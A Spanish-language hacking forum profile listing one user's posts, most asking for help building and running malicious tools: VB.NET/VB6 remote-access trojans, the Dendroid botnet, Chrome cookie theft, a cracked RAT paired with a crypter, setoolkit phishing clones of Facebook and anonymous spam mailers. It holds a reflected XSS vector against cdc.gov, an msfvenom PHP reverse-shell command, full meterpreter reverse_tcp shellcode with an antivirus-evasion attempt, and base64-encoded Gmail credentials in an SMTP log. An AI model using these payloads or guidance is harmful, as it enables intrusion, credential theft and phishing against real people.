Temas - cibi

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - cibi

Páginas1 2

Hacking ShowOff / [XSS Reflejado] Centro para el Control y Prevención de Enfermedades cdc.gov

Agosto 19, 2020, 04:18:16 AM

Hola, hace unos meses en pleno confinamiento del coronavirus encontré un xss en el Centro para el Control y Prevención de Enfermedades de USA.

URL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vulnerabilidad: XSS Reflejado
Vector: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta<script>alert('Bug in governament')</script>
Autor: cibi / cibx
Reportado: NO, no tardaron ni 2 minutos en arreglar el bug.

Dudas y pedidos generales / Ayuda para importar cookies a navegador a través de archivo .sqlite

Agosto 10, 2020, 12:33:07 PM

Hola estuve mucho tiempo sin entrar al foro, pero he vuelto y necesito resolver una duda muy importante para un proyecto, la verdad modifique una botnet prácticamente de cero la deje como nueva y conecta perfectamente, estuve haciendo unas pruebas con mi pc y el panel y funciona, el problema que al probar la opción steal cookies chrome junto con otro amigo me genera un archivo que se llama CookieCh.sqlite entonces lo que me gustaría es exportar correctamente las cookies en json y importarla al navegador de alguna manera.
He probado este programa de código abierto No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y puedo ver la cookie correctamente he probado otros programas también como DB Browser: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Puedo exportar correctamente la cookie.sqlite en json pero no se importa correctamente en el navegador. Alguien podría ayudarme ? He probado la extensión de google chrome edit this cookie y alguna otra mas para poder importarlo pero no se importa no me salen las cookies al importar...
Os dejo aquí el link del archivo con el que estoy trabajando:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Gracias a ver quien puede ayudarme !

Dudas y pedidos generales / Ayuda para compilar apk con android studio

Agosto 16, 2016, 06:16:48 PM

Hola he decompilado una apk para modificar una parte de su código el problema que al seleccionar Build en el menu y luego selecciono el boton para que genere el apk en la parte final me pide que seleccione un archivo de configuración alguien puede ayudarme?

Exactamente me refiero a esto:

Que archivo tengo que seleccionar?

Si no lo selecciono me da este error:

Dudas y pedidos generales / [SOLUCIONADO] Ayuda subir shell php en una web con sql injection

Agosto 12, 2016, 04:41:33 PM

Hola alguien conoce algun exploit para subir shell en una web que tenga sql injection?
O si hay alguna otra forma de hacerlo he visto algunas formas de hacerlo desde el navegador pero si alguien sabe de algún exploit se lo agradeceré.

Dudas y pedidos generales / Ayuda: Conseguir sesión de meterpreter con un payload PHP fuera de red

Julio 20, 2016, 11:52:59 AM

Hola necesito ayuda para conseguir una sesion de meterpreter visitando una url atraves de un payload php por ejemplo yo genero el payload
php con el siguiente comando:
msfvenom -p php/meterpreter/reverse_tcp LHOST=IP PUBLICA LPORT=4444 R > exploit.php
Tengo los puertos abiertos en el router 4444 subi el payload a un hosting free y utilize el exploit/multi/handler para esperar la conexion pero al entrar a la url al exploit.php se queda un rato cargando y me sale el siguiente mensaje:
no socket
Lo he probado varias veces pero no conecta y no recibo la sesion de meterpreter...
Alguien sabe que puede pasar?

Dudas y pedidos generales / Como poner un estado y ciudad determinado en tor?

Febrero 16, 2016, 10:54:52 AM

Hola necesito que alguien me ayude.. Puedo poner el nodo del país que quiera en tor editando el archivo torrc pero lo que quiero es poner un estado y ciudad, el que yo quiera eso es posible?
Y si es así como podría cambiar el estado y ciudad ?

Dudas y pedidos generales / Ayuda con la configuracion de la botnet dendroid

Agosto 22, 2015, 01:18:35 PM

Hola estoy configurando el panel de la botnet dendroid pero tengo un problema, lo estoy haciendo en localhost pero despues de crear la base de datos, el usuario y contraseña desde el phpmyadmin y relleno los datos en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta se redirige del archivo step1.php al index.php y tengo que rellenar los datos de nuevo...
No se que problema hay porque ya configure una vez la botnet y conseguí instalarla, la ultima vez solo me hizo falta modificar un archivo el reg.php para cambiar el host pero nada mas.
Alguien me puede ayudar porque pasa eso?

Dudas y pedidos generales / [SOLUCIONADO] Ayuda pasar declaración de crypter vb6 a vb.net

Mayo 20, 2015, 01:34:38 PM

Hola necesito ayuda estaba intentando pasar un crypter en vb6 a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y tengo problemas al pasar una declaración que es la siguiente:
Call FileCopy(App.Path & "\encrypt.dll", App.Path & "\Crypted.exe")
Como podría pasar eso a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta? el App.Path da error...

Dudas y pedidos generales / Duda sobre bozok rat

Mayo 02, 2015, 04:42:55 PM

Hola, necesito el bozok rat crackeado. Sé que está en este foro pero necesito que esté crackeado, porque cuando le doy clic derecho a get passwords para mostrar las contraseñas, me dice que compre la versión privada o algo así.

Necesito que alguien me lo consiga cracked, lo necesito urgente porque tengo un crypter fud y resulta que solo funciona con ese rat. Al encriptar y recibir la conexión, si pruebo con otros rats me da error...

Bueno a ver, si alguien puede ayudarme ...

#10

Dudas y pedidos generales / Duda sobre vulnerabilidades y auditorias

Abril 19, 2015, 11:32:51 AM

Hola tengo una duda es que hace un tiempo envié mi curriculum a una empresa de seguridad y al momento me respondieron y me preguntaron que software usaba para las auditorias y yo les dije una lista de todo lo que usaba para encontrar vulnerabilidades pero después de contestar y decirle todo lo que usaba no me volvieron a responder...
Por eso pensé que para buscar vulnerabilidades si trabajas para una empresa no se buscan vulnerabilidades mediante algún software como vega acunetix nexpose nikto o cualquier otro si no que se buscan manualmente, creo que por eso no me volvieron a responder. Puede ser por eso?
Ustedes que piensan?

#11

Dudas y pedidos generales / Ayuda con escritorio remoto de mi rat vb.net

Abril 10, 2015, 02:51:35 PM

Hola hace tiempo estoy haciendo un rat en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta privado pero el primer modulo que hice no conectaban los sockets entonces decidí
copiar el código de un rat llamado simple rat tambien en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y lo agrege a mi proyecto, ahora si conecta bien el problema que cuando
le doy clic derecho para ver el escritorio remoto me da el siguiente error:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

En el boton "Start" al darle clic da ese error el codigo es este:

Código: vbnet

Private Sub Button1_Click(sender As Object, e As EventArgs) Handles Button1.Click

        If Button1.Text = "Start" Then
            F.s.Send(sock, "@" & F.yy & C1.SelectedIndex & F.yy & C2.Text & F.yy & c.Value)
            Button1.Text = "Stop"
        Else
            Button1.Text = "Start"
        End If

    End Sub

Exactamente aquí:
F.s.Send(sock, "@" & F.yy & C1.SelectedIndex & F.yy & C2.Text & F.yy & c.Value)
Utilice de referencia el troyano simple rat alguien puede ayudarme ?
Por favor que algún moderador arregle el código y la imagen que al hacer el tema no me salían las opciones.

#12

Dudas y pedidos generales / Ocultar ip publica webattack setoolkit?

Marzo 31, 2015, 03:00:27 PM

Hola, al usar setoolkit si quiero clonar una web y usarla fuera de red, tengo que abrir puertos y poner mi ip pública. Pero quiero ocultarla, dado que no quiero que se vea mi ip pública.

Si pudiera usar otra ip con setoolkit... pero no funciona. He probado de usar vpn pero tampoco funciona. Alguien me ayuda? Hay alguna solución?

Se que se podría usar la ip publica de un pc infectado pero no hay otra manera?

#13

Dudas y pedidos generales / Quiero autentificarme en smtp de gmail con Gammadyne Mailer

Marzo 27, 2015, 10:24:28 AM

Hola hago este tema respecto al otro que hice de que tenia problemas al enviar emails he probado muchos mailers pero ninguno me va nunca llegan al destinatario en cambio los únicos que me van son estos dos:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta > Este llega a bandeja de spam.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta > Este llega a bandeja de entrada pero muestra mensaje de suplantación de identidad.
He visto este programa:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Se pueden enviar emails anonimos yo tengo el crack del programa pero cuando intento autentificarme en gmail en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta ya sea por el puerto 25, 465 o 587 no me deja autentificarme y si no me autentifico no me deja mandar emails por eso si alguien puede ayudarme con ese programa lo agradecere me da este error al probar si funciona mediante test smtp:

Código: php

Gammadyne Mailer 45.0 
SMTP Server Test
Performed on 27/3/2015 14:17:51

Server: smtp.gmail.com
User: [email protected]
Result: FAILED, code 3010: SMTP authentication failed.
>Authentication failed

Transcript:

220 mx.google.com ESMTP cj9sm2802162wjc.42 - gsmtp
>EHLO smtp.gmail.com
250-mx.google.com at your service, [MI IP]
250-SIZE 35882577
250-8BITMIME
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-CHUNKING
250 SMTPUTF8
>STARTTLS
220 2.0.0 Ready to start TLS
>SSL negotiated, cipher=ECDHE-RSA-AES128-GCM-SHA256, bits=128, version=TLSv1/SSLv3
>EHLO smtp.gmail.com
250-mx.google.com at your service, [MI IP]
250-SIZE 35882577
250-8BITMIME
250-AUTH LOGIN PLAIN XOAUTH XOAUTH2 PLAIN-CLIENTTOKEN
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-CHUNKING
250 SMTPUTF8
>AUTH LOGIN
334 VXNlcm5hbWU6
>YW5vbnltb3VzeGNyQGdtYWlsLmNvbQ==
334 UGFzc3dvcmQ6
>Y2FybGl0b3M5NG1zbg==
534-5.7.14 <https://accounts.google.com/ContinueSignIn?sarp=1&scc=1&plt=AKgnsbu1E
534-5.7.14 S7bCLnJPhDKqck_mFbt6gTeVLIuZJRFC9kvxHAHC56uDqgzSiBt9uUrmhQRMKSAYteRwBk
534-5.7.14 e-CKf5HS8WmYCxn6-S2Q7XHOOY3MC0EkrRXcKuHFOSMyUl-CG9Cb1_Fn1oBADhLt6ZS7wy
534-5.7.14 fOxw7slRYqZK_0xy-3klKud8e8UiDCnaDYPGqCjIHjtdQJ3_g0Km9-IoSWj7u5-98ixVi7
534-5.7.14 lFpFfNg> Please log in via your web browser and then try again.
534-5.7.14 Learn more at
534 5.7.14 https://support.google.com/mail/bin/answer.py?answer=78754 cj9sm2802162wjc.42 - gsmtp
>AUTH PLAIN AGFub255bW91c3hjckBnbWFpbC5jb20AY2FybGl0b3M5NG1zbg==
534-5.7.14 <https://accounts.google.com/ContinueSignIn?sarp=1&scc=1&plt=AKgnsbtG9
534-5.7.14 FYnpWARemWCbJUksvC5BTOnxnQ3zLpI_n93ADWW0TdEDB4AlZb7hZ3pSNa95kPErJ-gmNr
534-5.7.14 408tAN_8qHVuFpknP-M-Q_W0syT6fGkgGlKTOkUwI1796z1yP-2rYn0-GIadapzooiA2-m
534-5.7.14 SiPu66jV7yMZUUAAjRUMysOL7QlprgB8l-QH2BOIS-DTV71XCoHe2NtY5tnLaDntMt63aJ
534-5.7.14 gaRx0Ng> Please log in via your web browser and then try again.
534-5.7.14 Learn more at
534 5.7.14 https://support.google.com/mail/bin/answer.py?answer=78754 cj9sm2802162wjc.42 - gsmtp
>AUTH CRAM-MD5
504 5.7.4 Unrecognized Authentication Type cj9sm2802162wjc.42 - gsmtp
>All authentication methods exhausted, giving up


Operation completed: 27/3/2015 14:17:53
Elapsed time: 1.4 seconds

Probé de logearme con un email de prueba al smtp de gmail pero me da ese error..

#14

Dudas y pedidos generales / Ayuda enviar emails con xampp

Marzo 19, 2015, 12:12:12 PM

Hola necesito ayuda llevo bastante tiempo que no me funciona ningún mailer para enviar emails anónimos no llegan nunca al destinatario ya sea subiendo el mailer al hosting gratuito o en localhost, he visto este vídeo:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Que es un curso de php donde explica como enviar emails en localhost con xampp pero no hay manera nunca llegan...
He hecho todo lo del vídeo modificado php.ini y otras cosas pero no llegan nunca..
Un usuario me dijo que para eso necesitaba un servidor smtp no conozco ninguno pero creo que haciendo ese tutorial debería funcionar perfectamente con mercury..Alguna solución?

#15

Dudas y pedidos generales / Duda sobre libro visual basic 6 cliente servidor de michael macdonald

Marzo 14, 2015, 07:52:49 AM

Hola mi duda es si es posible obtener este libro en versión pdf:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Supongo que no porque lo he buscado por todas partes y no lo encuentro aparte de que creo que solo es posible comprarlo en papel como los de 0xword verdad?

#16

Dudas y pedidos generales / [SOLUCIONADO] Duda: cómo puedo instalar un sistema Scada en windows 7?

Febrero 20, 2015, 07:04:42 AM

Hola hace tiempo descubrí un exploit que según me dijeron si instalo un sistema scada en mi windows 7 seria vulnerable o eso me dijeron, el exploit es este:
exploit/windows/scada/realwin_scpc_initialize
El antivirus me paraba el ataque y al desactivarlo y usar el exploit no me daba sesión de meterpreter me dijeron que para que funcionara instalara un sistema scada en el windows 7 ya que tiene el puerto 912 abierto.
Alguien puede decirme como instalar sistema scada ? No se que es exactamente o que hacer para que pueda funcionar.

#17

Dudas y pedidos generales / Algún exploit kit funcional aunque este detectado por los antivirus?

Febrero 19, 2015, 12:00:35 PM

Hay algún exploit kit funcional que no de errores aunque lo detecten los av?
Descargue un pack que vi en otro foro pero dan muchos errores...
Alguien sabe alguno funcional? O no hay ninguno funcional aunque este detectado?

#18

Dudas y pedidos generales / Cifrar codigo en ruby?

Febrero 17, 2015, 03:03:47 PM

Hola he visto que hay paginas para cifrar códigos en html o javascript pero las hay en ruby?
Y si es así me podríais pasar alguna?

#19

Dudas y pedidos generales / [SOLUCIONADO] Duda: cuál es la mejor manera de aprender a programar?

Febrero 10, 2015, 12:43:43 PM

Pues tengo esa duda, la verdad se tarda mas en aprender un lenguaje por uno mismo que haciendo un grado superior (que lo tengo pensado) o estudiando ingeniería informática o teniendo un profesor al lado que te vaya resolviendo dudas pero cuando uno aprende por su cuenta creo que es mas duro y mas difícil y se tarda mas tiempo en entender un lenguaje por eso quiero que me deis vuestras opiniones porque aveces me cabreo cuando no me sale algo en programación y quiero aprender en poco tiempo pero es difícil y aveces cuando me pongo a leer me cuesta concentrarme, espero vuestras opiniones.

#20

Dudas y pedidos generales / Ayuda con la opción .Value vb.net

Febrero 09, 2015, 03:13:58 PM

Hola hace tiempo que estoy con el tema de un troyano en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y gracias al source de un troyano que vi en otro foro puede usar su código y aclararme un poco mejor ahora ya me conecta el servidor con el cliente pero lo que quiero ahora es que una vez se conecte algún pc al ejecutar el server y salga en las tablas del troyano pueda ver el escritorio remoto en el picturebox el caso es que me daba error he arreglado algunas cosas y ahora tengo un problema con la opcion .Value por ejemplo tengo este código:

Código: php

Private Sub Button1_Click(sender As Object, e As EventArgs) Handles Button1.Click
        If Button1.Text = "Start" Then
            F.s.Send(sock, "@" & F.yy & C1.SelectedIndex & F.yy & C2.Text & F.yy & c.Value)
            Button1.Text = "Stop"
        Else
            Button1.Text = "Start"
        End If
    End Sub

Este código es del botón start para ver el escritorio remoto en el picture box y el error me da en c.Value, me dice lo siguiente:
'Value' no es un miembro de 'System.Windows.Forms.DomainUpDown'
c es el nombre del domainupdown pero al escribir c. no me da la opción de poner Value alguien sabe que podría hacer para que no me de ese error?

#21

Dudas y pedidos generales / [SOLUCIONADO] Ayuda no me funcionan las vpn en kali linux

Enero 21, 2015, 02:02:27 PM

Hola estoy intentando usar y probando varias vpn en linux con openvpn, al usar el comando:

openvpn nombredelavpn.ovpn

Me sale que se ha conectado correctamente a la vpn pero si por ejemplo quiero entrar en google o cualquier pagina que no sea mi puerta de enlace que es 192.168.1.1 se queda cargando y nunca accede a la pagina como si no me funcionara el internet alguien puede ayudarme?

Antes no me pasaba eso...

#22

Dudas y pedidos generales / [SOLUCIONADO] Evitar ataques ddos con cloudflare en joomla?

Enero 05, 2015, 02:29:27 PM

Hola alguien puede decirme como puedo poner el cloudflare en una pagina web hecha con joomla para evitar ataques ddos?

#23

Dudas y pedidos generales / [SOLUCIONADO] Cómo usar dns tipo noip con bouncer ?

Enero 04, 2015, 10:46:00 AM

Hola hace tiempo estoy tratando de ocultar la ip publica de un dns como el noip, me dijeron que la mejor opción era utilizar un bouncer pero no entiendo como utilizar uno alguien puede darme alguna referencia?
También probé de usar una vpn pero a la hora de usarlo con un troyano no funciona... alguien puede ayudarme?

#24

Dudas y pedidos generales / Codigo fuente del mario bros en vb.net o vb6 sin errores?

Diciembre 28, 2014, 11:23:40 AM

Hola se que este foro no tiene nada que ver con los videojuegos pero me gustaría saber si alguien tiene o conoce algún código fuente del mario bros en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta o vb6 sin errores he buscado mucho y he descargado algunos en vb6 pero no van bien, he visto este vídeo:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Pero el código fuente lo perdió y ya no existe me pregunto si alguien tiene o me puede pasar algún código fuente el mario bros aunque sea lo mas cutre en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta o vb6 también lo he visto en C++ y C# pero contenía errores y muchos si alguien me puede pasar alguno que funcione lo agradeceré.. aunque yo prefiero uno en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta pero sera dificil encontrarlo..
Si esta en C tampoco me importa pero que no contenga errores

#25

Debates, Reviews y Opiniones / Quien suele ganar mas dinero un white hat o un black hat?

Diciembre 21, 2014, 10:33:11 AM

Hola que pensáis quien gana mas dinero en el mundo de la seguridad, programación y hacking un white hat trabajando para una empresa en seguridad o como programador, o un black hat vendiendo virus malware en general o vender malware o ganar dinero de forma ilegal?
Y pensáis que vender algo de malware es de black hat o no tiene nada que ver?
Espero sus respuestas. Solo por curiosidad saludos

#26

Dudas y pedidos generales / [SOLUCIONADO] Guardar pass desde un boton contenida en un textbox en vb.net

Diciembre 19, 2014, 04:16:10 PM

Hola estoy tratando de acabar mi troyano en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta que solo me faltan unos detalles, tengo un formulario aparte con el botón de listen para escuchar un puerto y otro textbox donde ira la password con un botón de guardar, cuando yo ponga la contraseña en el textbox, al darle al boton de guardar quiero que se guarde la contraseña y al cerrar el formulario y volverlo a abrir quiero que siga saliendo en el textbox alguien puede ponerme un código simple de como podría hacerlo?
He intentado de hacerlo mediante un archivo que se llame settings.ini pero al cerrar el formulario y volverlo abrir no sale la contraseña en el textbox alguien puede ayudarme?

#27

Dudas y pedidos generales / [SOLUCIONADO] Cómo hacer una empresa parecida a virustotal para analizar malware

Diciembre 16, 2014, 05:00:00 PM

Me gustaría hacer una empresa parecida a la de virustotal para analizar malware pero aparte de saber como hacerla me gustaría saber que saldría mas a cuenta, que envié muestras a las compañías de antivirus o que no envié muestras pero que tengas que pagar para poder analizar.
Esa es mi duda.

#28

Dudas y pedidos generales / [SOLUCIONADO] Duda infectar pc con pdf malicioso, metasploit y darkcomet

Diciembre 11, 2014, 10:22:23 AM

Hola tenia una duda que vi en globbtv donde salia kevin mitnick en un vídeo de mundo hacker day, kevin mitnick lo que hizo fue utilizar metasploit para generar un pdf y al abrirlo le salia el pc infectado en darkcomet, mi pregunta es alguien entiende como lo hizo?

#29

Dudas y pedidos generales / [SOLUCIONADO] Dudas troyano en vb.net

Diciembre 07, 2014, 01:54:21 PM

Hola hace un tiempo hice un tema de un problema que tenia con un troyano en vb6 ahora me he pasado al No tienes permitido ver los links. Registrarse o Entrar a mi cuenta porque creo que es mejor y me están ayudando a acabarlo pero tenia unas dudas con el troyano en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, le puse un formulario aparte con el campo noip puerto el botón de crear servidor funciona perfectamente ya el problema que no se como hacer para que al ejecutar el servidor se conecte al cliente y salga en las tablas, una vez me dijeron que se podía hacer con el winsock pero no consigo que me salga en las tablas, se necesita mucho código para que al ejecutar el server se conecte en las tablas del cliente?

#30

Dudas y pedidos generales / Problema con skins en vb .net

Noviembre 29, 2014, 04:36:42 PM

Hola he intentado poner un skin en un troyano en vb .net, y ahora no se me abre el troyano...
Arrastro el activeskin al formulario y luego el form_load escribo el siguiente código:

Me.AxSkin1.LoadSkin(Skin.skn)
Me.AxSkin1.ApplySkin(Me.Handle)

Tengo una duda en esta parte del código:

Me.AxSkin1.LoadSkin(Skin.skn)

Entre los paréntesis tengo que poner el nombre del skin o la ruta donde se encuentra el skin?
Es que no puedo ni borrar el skin ni ponerlo y cuando abro el troyano no se me abre y al compilarlo desde el código fuente me da este error:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Como puedo solucionarlo? Todo por culpa de poner el skin...
En vb6 era mucho mas sencillo..

#31

Dudas y pedidos generales / [SOLUCIONADO] Ayuda redirigir ip publica setoolkit con ettercap

Noviembre 25, 2014, 01:27:27 PM

Hola he estado haciendo pruebas con setoolkit clonando por ejemplo la pagina de facebook o cualquier otra y abriendo el puerto 80 en el router para usar la ip publica y que al clonar la pagina de facebook o cualquier otra me funcione fuera de red, lo que quiero ahora es redirigir mi ip publica a la pagina de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta quiero decir al entrar en la url http://MiIPpublica se redirija a la pagina de facebook o a la que yo escoja clonar con setoolkit, eso se puede hacer con ettercap?
Yo se que se puede hacer al revés pero de esta manera no se si se puede, haber si alguien puede decirme como redirigir mi ip publica a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

#32

Dudas y pedidos generales / Se puede usar noip con proxy o existe alguna especie de noip privado ?

Noviembre 16, 2014, 05:08:40 PM

Pues me gustaría saber si se puede usar noip con un proxy y al analizar un server y querer ver que ip publica o no ip que este detrás de un ejecutable salga otra ip y no la mía, o si existe alguna pagina que permita tener un host como el noip pero que sea seguro haber si alguien sabe algo acerca de esto solo es por curiosidad...

#33

Dudas y pedidos generales / Ayuda este exploit me sirve para elevar privilegios y tener permisos en ssh?

Noviembre 06, 2014, 07:13:14 AM

Hola me gustaría saber si este exploit me serviría para tener permisos de root si tengo acceso a un servidor ssh?
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Este exploit esta en c y al compilarlo y ejecutarlo me da las siguientes opciones:
./exploit [-l <retloc offset>] [-r <retaddr offset>] [-v <version pad>] <target>
Pero no se a que se refiere con las 3 primeras opciones estoy buscando un root exploit con el que pueda elevar privilegios y tener permisos si tengo acceso a un servidor ssh y poder usar mis puertas traseras, snifers etc...
O que exploit me serviría ?

#34

Dudas y pedidos generales / Ayuda cifrando shellcode windows/meterpreter/reverse_tcp

Octubre 17, 2014, 04:14:30 PM

Hola hace unos días publique un tema de que necesitaba el source de un payload, ahora estoy intentando cifrar la shellcode del payload: windows/meterpreter/reverse_tcp
Yo conozco un método para cifrar una shellcode que era sumándole 3 a cada byte en hexadecimal por ejemplo esta es la shellcode original del payload windows/meterpreter/reverse_tcp

Código: php

 "\xFC\xE8\x86\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
            "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
            "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
            "\x8B\x52\x10\x8B\x42\x3C\x8B\x4C\x10\x78\xE3\x4A\x01\xD1\x51\x8B" +
            "\x59\x20\x01\xD3\x8B\x49\x18\xE3\x3C\x49\x8B\x34\x8B\x01\xD6\x31" +
            "\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4\x03\x7D\xF8" +
            "\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B" +
            "\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61" +
            "\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x89\x5D\x68\x33\x32" +
            "\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07\xFF\xD5\xB8" +
            "\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00\xFF\xD5\x50" +
            "\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF\xD5\x97\x6A" +
            "\x05\x68\x7F\x00\x00\x01\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56" +
            "\x57\x68\x99\xA5\x74\x61\xFF\xD5\x85\xC0\x74\x0C\xFF\x4E\x08\x75" +
            "\xEC\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x00\x6A\x04\x56\x57\x68\x02" +
            "\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00\x00\x56\x6A" +
            "\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x6A\x00\x56\x53\x57\x68" +
            "\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75\xEC\xC3"

Según me dijo un usuario para cifrar en hexadecimal se contaba de esta manera:
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, a, b, c, d, e, f
Entonces por ejemplo si quiero cifrar el primer digito de \xFC\ cifrada seria:
\xFF\ Y luego según me dijeron le tenia que sumar 1 al otro dígito y quedaría de esta manera:
\x0F\
Ya que me dijeron que una vez llegaba a f volvía a contar desde el 0 y he hecho todo este proceso manualmente con la shellcode completa y toda cifrada quedaría así:

Código: php

"\x0F\xFB\x99\x13\x13\x13\x73\x9C\xF8\x44\xE5\x77\x9E\x65\x43\x9E" +
            "\x65\x1F\x9E\x65\x27\x9E\x85\x41\x12\xCA\x5D\x39\x44\x02\x44\xD3" +
            "\xBF\x4F\x74\x8F\x15\x3F\x33\xD4\xD2\x10\x14\xDA\xF5\x03\x65\x6A" +
            "\x9E\x65\x23\x9E\x55\x4F\x9E\x5F\x23\x8B\xF6\x5D\x14\xE4\x64\x9E" +
            "\x6C\x33\x14\xE6\x9E\x62\x31\xF6\x4F\x5C\x9E\x47\x9E\x14\xE9\x44" +
            "\x02\x44\xD3\xBF\xD4\xD2\x10\x14\xDA\x51\xF3\x88\x07\x16\x80\x0B" +
            "\x4E\x80\x37\x88\xF5\x6B\x9E\x6B\x37\x14\xE6\x79\x9E\x1F\x5E\x9E" +
            "\x6B\x2F\x14\xE6\x9E\x17\x9E\x14\xE3\x9C\x57\x37\x37\x6E\x6E\x74" +
            "\x6C\x6D\x64\x02\xF3\x6B\x62\x6D\x9E\x25\xFE\x9C\x60\x7B\x46\x45" +
            "\x13\x13\x7B\x8A\x86\x45\x62\x67\x7B\x5F\x8A\x39\x1A\x02\xE8\xCB" +
            "\xA3\x14\x13\x13\x3C\xD7\x67\x63\x7B\x3C\x93\x7E\x13\x02\xE8\x63" +
            "\x63\x63\x63\x53\x63\x53\x63\x7B\xFD\x12\xE2\xF3\x02\xE8\xAA\x7D" +
            "\x18\x7B\x82\x13\x13\x14\x7B\x15\x13\x24\x6F\x9C\xF9\x7D\x23\x69" +
            "\x6A\x7B\xAC\xB8\x87\x74\x02\xE8\x98\xD3\x87\x1F\x02\x51\x1B\x88" +
            "\xFF\x7B\x03\xC8\xB5\x69\x02\xE8\x7D\x13\x7D\x17\x69\x6A\x7B\x15" +
            "\xEC\xDB\x62\x02\xE8\x9E\x49\x7D\x53\x7B\x13\x23\x13\x13\x69\x7D" +
            "\x13\x7B\x6B\xB7\x66\xF8\x02\xE8\xA6\x66\x7D\x13\x69\x66\x6A\x7B" +
            "\x15\xEC\xDB\x62\x0B\xE8\x14\xD6\x3C\xD9\x98\x09\x88\xFF\xD6"

No se si me abre equivocado en algún dígito ya que me lio un poco, entonces una vez cifre la shellcode pase el code completo a la ruta donde se encontraba antes el payload windows/meterpreter/reverse_tcp, después de haber puesto el code del payload donde estaba antes probé en una terminal de crear un ejecutable con ese payload:
msfpayload windows/meterpreter/reverse_tcp LHOST=MI IP LPORT=4444 x > payloadcifrado.exe
Al meterlo en mi otro pc con windows y avast, el avast lo detecto...
Este método de cifrar una shellcode sumando 3 a cada byte sirve para poder crear un ejecutable malicioso indetectable, o solo sirve para exploits normales?
Haber si alguien me puede aclarar esta duda porque puede que la haya cifrado mal, me haya equivocado en algún dígito o este método ya no funcione...

#35

Off Topic / Porque todas las películas de hackers que hay la mayoría son antiguas?

Octubre 06, 2014, 11:01:56 AM

Hola alguien conoce películas de hackers nuevas? He visto algunas de hace años que están muy bien como la famosa película: Juegos de Guerra
Y la que sale Kevin Mitnick y algunas mas que están bien pero la mayoría son de hace años y no hay ninguna mas moderna?
La mas moderna que hay creo que es la de reboot de una chica que tiene que usar metasploit para quitarse un iphone pegado en la mano pero no me gusto mucho...
Creo que lo mas nuevo que hay son documentales y los capítulos de mundo hacker tv pero que haya películas mas modernas que yo sepa no jaja.

#36

Dudas y pedidos generales / Problemas con troyano en vb6

Octubre 02, 2014, 05:31:50 PM

Hola me gustaría que alguien me ayudara a resolver unos problemas que tengo con un troyano en vb6, el primer problema es que he usado un skin para el troyano y cuando lo ejecuto me sale el skin perfectamente pero los nombres de los labels no están, quiero decir que no se ven...
Hay alguna solución para que se vean los nombres de los labels?
Por otra parte no acabo de entender como acabar el troyano quiero decir la parte de guardar el server cuando le asigne el noip y el puerto.

#37

Dudas y pedidos generales / Ayuda necesito el source del payload java/meterpreter/reverse_tcp o otro

Septiembre 27, 2014, 03:01:04 PM

Hola me gustaría saber donde puedo encontrar el source del payload java/meterpreter/reverse_tcp donde pueda encontrar la shellcode, quiero intentar cifrar la shellcode de un exploit bueno solo era eso.
También me gustaría saber como unir el payload al exploit supongo que me entenderán.

#38

Dudas y pedidos generales / [SOLUCIONADO] Como puedo extraer los metadatos de una imagen .jpg en bash?

Septiembre 22, 2014, 03:57:03 AM

Hola conozco la herramienta exiftool en perl que puede extraer los metadatos de un archivo pero me preguntaba si alguien sabe como extraer los metadatos de una imagen .jpg en bash, ya se que con exiftool también se puede pero tengo un poco de conocimientos en bash y he programado un script con varias opciones y la única opción que me falta es que extraiga los metadatos de una imagen jpg y no sabría como hacerlo en bash si alguien puede ayudarme o orientarme lo agradeceré.

#39

